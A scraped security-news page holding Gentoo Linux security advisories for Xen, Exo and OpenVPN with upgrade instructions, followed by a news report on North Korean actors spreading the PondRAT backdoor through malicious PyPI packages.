[ 13 ] CVE-2023-46835  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46835  
[ 14 ] CVE-2023-46836  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46836  
[ 15 ] CVE-2023-46837  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46837  
[ 16 ] CVE-2023-46839  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46839  
[ 17 ] CVE-2023-46840  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46840  
[ 18 ] CVE-2023-46841  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46841  
[ 19 ] CVE-2023-46842  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46842  
[ 20 ] CVE-2024-2193  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2193  
[ 21 ] CVE-2024-31142  
      https://nvd.nist.gov/vuln/detail/CVE-2024-31142  
[ 22 ] XSA-431  
      https://xenbits.xen.org/xsa/advisory-431.html  
[ 23 ] XSA-432  
      https://xenbits.xen.org/xsa/advisory-432.html  
[ 24 ] XSA-436  
      https://xenbits.xen.org/xsa/advisory-436.html  
[ 25 ] XSA-437  
      https://xenbits.xen.org/xsa/advisory-437.html  
[ 26 ] XSA-438  
      https://xenbits.xen.org/xsa/advisory-438.html  
[ 27 ] XSA-439  
      https://xenbits.xen.org/xsa/advisory-439.html  
[ 28 ] XSA-440  
      https://xenbits.xen.org/xsa/advisory-440.html  
[ 29 ] XSA-441  
      https://xenbits.xen.org/xsa/advisory-441.html  
[ 30 ] XSA-442  
      https://xenbits.xen.org/xsa/advisory-442.html  
[ 31 ] XSA-447  
      https://xenbits.xen.org/xsa/advisory-447.html  
[ 32 ] XSA-449  
      https://xenbits.xen.org/xsa/advisory-449.html  
[ 33 ] XSA-450  
      https://xenbits.xen.org/xsa/advisory-450.html  
[ 34 ] XSA-451  
      https://xenbits.xen.org/xsa/advisory-451.html  
[ 35 ] XSA-452  
      https://xenbits.xen.org/xsa/advisory-452.html  
[ 36 ] XSA-453  
      https://xenbits.xen.org/xsa/advisory-453.html  
[ 37 ] XSA-454  
      https://xenbits.xen.org/xsa/advisory-454.html  
[ 38 ] XSA-455  
      https://xenbits.xen.org/xsa/advisory-455.html

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-10

Gentoo Linux Security Advisory 202409-9 - A vulnerability has been discovered in Exo, which can lead to arbitrary code execution. Versions greater than or equal to 4.17.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Exo: Arbitrary Code Execution  
     Date: September 22, 2024  
     Bugs: #851201  
       ID: 202409-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Exo, which can lead to arbitrary  
code execution.

Background  
==========

Exo is an Xfce library targeted at application development, originally  
developed by os-cillation. It contains various custom widgets and APIs  
extending the functionality of GLib and GTK. It also has some helper  
applications that are used throughout the entire Xfce desktop to manage  
preferred applications and edit .desktop files.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
xfce-base/exo  < 4.17.2      >= 4.17.2

Description  
===========

A vulnerability has been discovered in Exo. Please review the CVE  
identifiers referenced below for details.

Impact  
======

Exo executes remote desktop files which may lead to unexpected arbitrary  
code execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Exo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=xfce-base/exo-4.17.2"

References  
==========

[ 1 ] CVE-2022-32278  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32278

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-09

Gentoo Linux Security Advisory 202409-8 - Multiple vulnerabilities have been discovered in OpenVPN, the worst of which could lead to information disclosure. Versions greater than or equal to 2.6.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: OpenVPN: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #835514, #917272  
       ID: 202409-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in OpenVPN, the worst of  
which could lead to information disclosure.

Background  
==========

OpenVPN is a multi-platform, full-featured SSL VPN solution.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-vpn/openvpn  < 2.6.7       >= 2.6.7

Description  
===========

Multiple vulnerabilities have been discovered in OpenVPN. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All OpenVPN users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-vpn/openvpn-2.6.7"

References  
==========

[ 1 ] CVE-2022-0547  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0547  
[ 2 ] CVE-2023-46849  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46849  
[ 3 ] CVE-2023-46850  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46850

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-08

Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign.
PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in

Software Security / Supply Chain

Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign.

PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in attacks related to the 3CX supply chain compromise last year.

Some of these attacks are part of a persistent cyber attack campaign dubbed Operation Dream Job, wherein prospective targets are lured with enticing job offers in an attempt to trick them into downloading malware.

"The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular repository of open-source Python packages," Unit 42 researcher Yoav Zemah said, linking the activity with moderate confidence to a threat actor called Gleaming Pisces.

The adversary is also tracked by the wider cybersecurity community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, a sub-cluster within the Lazarus Group that's also known for distributing the AppleJeus malware.

It's believed that the end goal of the attacks is to "secure access to supply chain vendors through developers' endpoints and subsequently gain access to the vendors' customers' endpoints, as observed in previous incidents."

The list of malicious packages, now removed from the PyPI repository, is below -

*   real-ids (893 downloads)
*   coloredtxt (381 downloads)
*   beautifultext (736 downloads)
*   minisound (416 downloads)

The infection chain is fairly simple in that the packages, once downloaded and installed on developer systems, are engineered to execute an encoded next-stage that, in turn, runs the Linux and macOS versions of the RAT malware after retrieving them from a remote server.

Further analysis of PondRAT has revealed similarities with both POOLRAT and AppleJeus, with the attacks also distributing new Linux variants of POOLRAT.

"The Linux and macOS versions \[of POOLRAT\] use an identical function structure for loading their configurations, featuring similar method names and functionality," Zemah said.

"Additionally, the method names in both variants are strikingly similar, and the strings are almost identical. Lastly, the mechanism that handles commands from the \[command-and-control server\] is nearly identical."

PondRAT, a leaner version of POOLRAT, comes with capabilities to upload and download files, pause operations for a predefined time interval, and execute arbitrary commands.

"The evidence of additional Linux variants of POOLRAT showed that Gleaming Pisces has been enhancing its capabilities across both Linux and macOS platforms," Unit 42 said.

"The weaponization of legitimate-looking Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can result in malware infection that compromises an entire network."

The disclosure comes as KnowBe4, which was duped into hiring a North Korean threat actor as an employee, said more than a dozen companies "either hired North Korean employees or had been besieged by a multitude of fake resumes and applications submitted by North Koreans hoping to get a job with their organization."

It described the activity, tracked by CrowdStrike under the moniker Famous Chollima, as a "complex, industrial, scaled nation-state operation" and that it poses a "serious risk for any company with remote-only employees."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#linux